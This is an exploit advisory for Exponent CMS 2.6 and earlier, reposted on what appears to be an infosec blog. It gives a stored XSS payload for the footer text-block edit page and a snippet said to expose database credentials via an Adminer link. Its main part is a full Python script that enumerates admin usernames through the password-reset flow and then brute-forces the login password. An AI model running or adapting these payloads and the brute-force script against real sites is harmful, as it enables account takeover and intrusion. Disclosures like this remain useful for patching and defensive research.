Thursday, April 18, 2024

Exponent CMS 2.6 – Multiple Vulnerabilities

# Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities
# Exploit Author: heinjame
# Date: 22/10/2021
# Exploit Author: picaro_o
# Vendor Homepage: https://www.exponentcms.org/
# Version: <=2.6
# Tested on: Linux os

*Stored XSS*

Affected parameter = >
http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title,
Text Block)

Payload = <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

** *Database credential are disclosed in response ***

POC
```
var adminerwindow = function (){
             var win =
window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');
             if (!win) { err(); }
         }
```

**Authentication Bruteforce*
```
import argparse
import requests
import sys

parser = argparse.ArgumentParser()
parser.add_argument("url", help="URL")
parser.add_argument("Username list", help="Username List")
parser.add_argument("Password list", help="Password List")
pargs = parser.parse_args()

host = sys.argv[1]
userlist = sys.argv[2]
passlist = sys.argv[3]

try:
    readuser = open(userlist)
    readpass = open(passlist)
except:
    print("Unable to load files")
    exit()
def usernamebrute():
    s = requests.Session()
    for username in readuser.readlines():
        brute={
                'controller':(None,'users'),
                'src':(None,''),
                'int':(None,''),
                'action':(None,'send_new_password'),
                'username':(None,username.strip()),
        }
        bruteforce = s.post(host+"/index.php",files=brute)
        status = s.get(host+"/users/reset_password")
        if "administrator" in status.text:
            print("[+] Found username : "+ username)
            adminaccount = username
            checkpoint = True
            return adminaccount,checkpoint
            break

def passwordbrute(adminaccount):
    s = requests.Session()
    s.cookies.set("csrftoken", "abc")
    header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0)
Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',
'Referer': host+'/login/showlogin'
    }
    for password in readpass.readlines():
        brute={
                'controller':'login',
                'src':'',
                'int':'',
                'action':'login',
                'username':adminaccount,
                'password':password.strip()
        }
        bruteforce = s.post(host+"/index.php",headers=header,data=brute)
        # print(bruteforce.text)
        status = s.get(host+"/login/showlogin",cookies=csrf)
        print(status.text)
        if "Invalid Username / Password" not in status.text:
            print("[+] Found Password : "+ password)
            break

adminaccount,checkpoint = usernamebrute()
if checkpoint == True:
    passwordbrute(adminaccount)
else:
    print("Can't find username,We can't proceed sorry :(")

```
Bookmark
ClosePlease login
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  Horizon Offers $1M Bounty to Hackers Who Stole $100M
- Sponsored -

Sponsored Offer

Unleash the Power of the Cloud: Grab $200 Credit for 60 Days on DigitalOcean!

Digital ocean free 200

Discover more infosec

User Avatar
Steven Black (n0tst3)
Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK. I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated... I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK. I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

more infosec reads

Subscribe for weekly updates

explore

more

security